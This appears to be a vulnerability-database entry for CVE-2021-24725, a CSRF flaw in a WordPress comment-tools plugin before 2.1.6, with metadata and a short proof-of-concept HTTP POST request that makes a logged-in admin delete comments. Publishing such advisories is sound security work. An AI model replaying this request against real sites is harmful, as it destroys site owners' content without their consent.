Lucene search
WpvulndbWPEX-ID:01483284-57F5-4AE9-B5F1-AE26B623571FHistoryAug 23, 2021 - 12:00 a.m.
Comment Link Remove and Other Comment Tools < 2.1.6 - Arbitrary Comment Deletion via CSRF
2021-08-2300:00:00
wpvulndb
399
0.001 Low
EPSS
Percentile
30.4%
The plugin does not have CSRF check in its ‘Delete comments easily’, which could allow attackers to make logged in admin delete arbitrary comments
POST /wp-admin/admin.php?page=comment-link-remove HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Connection: keep-alive
Cookie: [admin+ cookies]
Upgrade-Insecure-Requests: 1
delAllCmts=delAllCmtsRelated
wpvulndb
wpvulndb
prion
prion
Cross site request forgery (csrf)
2021-09-13 18:15:00
patchstack
patchstack
cve
cve
CVE-2021-24725
2021-09-13 18:15:18
cvelist
cvelist
nvd
nvd
CVE-2021-24725
2021-09-13 18:15:18